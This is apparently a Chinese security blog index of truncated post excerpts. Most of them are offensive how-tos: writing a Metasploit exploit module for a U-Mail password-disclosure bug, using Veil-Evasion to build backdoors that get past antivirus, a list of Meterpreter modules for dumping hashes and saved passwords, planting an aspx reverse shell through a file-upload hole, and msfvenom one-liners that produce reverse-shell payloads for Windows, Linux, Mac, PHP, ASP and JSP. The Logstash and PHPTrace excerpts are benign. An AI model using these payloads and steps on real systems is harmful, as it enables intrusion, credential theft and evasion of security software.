2018-12-15 03:04:55

AttackFilter-logstash-filter-attackfilter

AttackFilter logstash-filter-attackfilter-1.0.6 此插件为 ElasticSearch 导入工具 Logstash 扩展安全分析插件  AttackFilter插件安装 下载插件 git clone http://github.com/attackfilter 在 logstash-X.X.X/Gemfile 加入插件路径信息 mv attackfilter logstash-X.X.X/vendor/bundle/jruby/1.9/gems/ vim logstash-X.X.X/Gemfile gem "logstash-filter-attackfilter", :path => "./vendor/bundle/jruby/1.9/gems/logstash-filter-attackfilter-1.0.6"  AttackFilter使用 配置 Logstash 导入配置文件 test.conf input { file { path => "/web-log-2018-01-01.log" start_position => "beginning" } } filter { grok {

2016-07-25 06:22:29

metasploit 模块编写

1. 编写规范 参考如下: https://ruby-china.org/wiki/coding-style 2. 示例参考 以乌云上的漏洞来源为例子:http://www.wooyun.org/bugs/wooyun-2010-061894/(用户在写模块时,可自行从网上搜索漏洞) U-Mail邮件系统权限设置问题导致任意用户密码可越权查看,指定为一个已存在的邮箱账号即可查看任意账户密码。 新建一个新的利用模块umail_pass.rb cd /opt/metasploit/apps/pro/msf3/modules/exploits vi umail_pass.rb 示例代码如下: #encoding:utf-8 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "U-Mail System Unauthorized Access V

2016-07-24 17:14:06

使用veil-evasion+metasploit生成后门

Veil Evasion是一个可执行文件,它被用来生成Metasploit的payload,能绕过常见杀软。 Veil-Evasion被原生设计为在kali上,但其实存在python环境的系统上应该都能运行。你可以用命令行轻松调用Veil-Evasion,按菜单选项生成payload。 在创建payload的时候,Veil-Evasion会询问你是否想把payload文件用Pyinstaller或者Py2Exe转为可执行文件。 1、安装 veil-evasion,kalilinux可以直接 apt-get install veil-evasion,或者直接到官网下载: https://github.com/Veil-Framework/Veil 2、使用 使用use、list可以列出当前可用的模块 如果要使用某个模块可以直接输入 use + 模块的名称,例如 use python/meterpreter/rev_tcp,或者是直接 use + 模块前面的序号。 使用模块和metasploit的模块 使用方法很相似 options — 列出当前可以设置的选项 set LHOST, set LPORT,设置相关的端口号和ip(ip也可以是域名,方便外网上线) generate—当ip和端口都设置好了之后就可以生成payload。 生成成功后会显示如下内容: 可以到/var/lib/ve

2016-07-24 16:52:48

metasploit 常用模块

爬虫: auxiliary/crawler/msfcrawler 判断存活主机: meterpreter > run arp_scanner -r 寻找局域网里面匿名ftp auxiliary/scanner/ftp/anonymous 寻找putty保存的密码 meterpreter > run enum_putty 寻找ie保存的密码 meterpreter > run post/windows/gather/enum_ie windows的口令: meterpreter > run windows/gather/smart_hashdump 得到本地路由: meterpreter > run get_local_subnets 暴力破解: use auxiliary/scanner/mssql/mssql_login mssql执行cmd: use auxiliary/admin/mssql/mssql_exec 端口扫描 auxiliary/scanner/portscan scanner/portscan/ack ACK防火墙扫描 scanner/portscan/ftpbounce FTP跳端口扫描 scanner/portscan/syn SYN端口扫描 scanner/portscan/tcp TCP端口扫描 scanner/port

2016-07-24 16:21:41

metasploit 使用 aspxshell 进行内网渗透

在http://xxxx.xxx.xx.xxx发现任意文件上传漏洞,果断上传webshell 首先用Metasploit生成反弹马,也就是生成反弹的payload: 成功生成反弹型payload: (1)生成win下的exe msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe (2)生成win下的aspx msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx (3)我生成一个aspx的反弹马 然后启动msfconsole (4)本地监听,反弹后的控制端: use exploit/multi/handler (5)本地监听的确定用哪个payload: set payload windows/meterpreter/reverse_tcp (6)设置本地监听的端口: set lport 7788 (7)设置本地的监听的地址: set lhost 0.

2016-05-01 04:39:49

metasploit EXITFUNC

This EXITFUNC option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete. 这exitfunc选项有效地设置一个hash函数 EXITFUNC 有4种不同的值 : none(无), seh(发生错误时), thread(线程) and process(进程). 通常它被设置为线程或进程,其对应于了 ExitThread 或 ExitProcess 函数的调用。 " none" 参数将调用 GetLastError函数,实际上是一个无操作. 然后,该线程将继续执行,可以方便地挂接多个payload一起被串行运行。 EXITFUNC在某些情况下还是很有用的,等你利用完一个启动框架以后,想要干净的退出,但是很不幸的是很多 payload没有退出执行函数 SEH 当存在程序出现异常处理(SEH)发生错误时,自动重新启动该线程或进程应使用此方法。 THREAD 这种方法是用在大多数的情况下,利用开发过程(如IE)运行 shellcode在子线程和线程,可以在工作应用程序/系统(干净的退出)退出这个线程 PROCESS 这个方法应该多/处理器使用..这种方法也可用于任何漏

2016-04-28 12:16:06

msfvenom 生成各类payload

列出 payloads msfvenom -l 二进制 Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho Web网马Payloads PHP msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp JSP msfvenom -p java/jsp_shell_reverse_tcp

2016-04-28 02:33:20

msfvenom help

[#] msfvenom 执行参数 root@~$msfvenom -h Usage: ./msfvenom [options] <var=val> Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定 --payload-options 列举payload的标准选项 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, --nopsled <length> 为payload预先指定一个NOP滑动长度 -f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表) -e, --encoder [encoder] 指定需要使用的encoder(编码器) -a, --arch <architecture> 指定payloa

2016-04-09 01:56:04

2016-03-08 14:00:38

PHPTrace 0.3

PHPTrace发布了0.3版本,这次新版本发布距离上一次更新将近两个月。在这段时间里,我们放缓了新功能的开发,重新推敲这个工具能够为大家带来的价值,并且在细节和稳定性方面都有了很大的提升。 PHPTrace是什么? PHPTrace是一个低开销的用于跟踪、分析PHP运行情况的工具。 它可以跟踪PHP在运行时的函数调用、请求信息、执行流程,并且提供有过滤器、统计信息 、当前状态等实用功能。在任何环境下,它都能很好的定位阻塞问题以及在高负载下Debug,尤其是线上产品环境。 新版本改动 PECL 相信有心的同学一定发现PHPTrace出现在PECL了。 没错,我们将新版本发布到了PHP官方的扩展库中,伴随而来的还有: 开源协议变更为Apache 2.0 扩展的名称变更为trace 关注细节 为了将trace功能本身做到极致,我们对PHP的扩展做了重构,并且着重完善了很多细节: 新增对main函数、include、require、闭包、匿名函数、eval()等特殊调用的支持 新增对PHP紧急退出后未完成的调用信息的持续收集 新增对Trait的Alias名称支持 新增对PHP 5.1的支持 优化zval的表现形式,完善对数组、对象的支持 优化扩展在非trace期间的性能(通过Zend/bench.php测试与不加载扩展时一致) 在这里可以查看全部改动的说明。 phptrace是一个低开销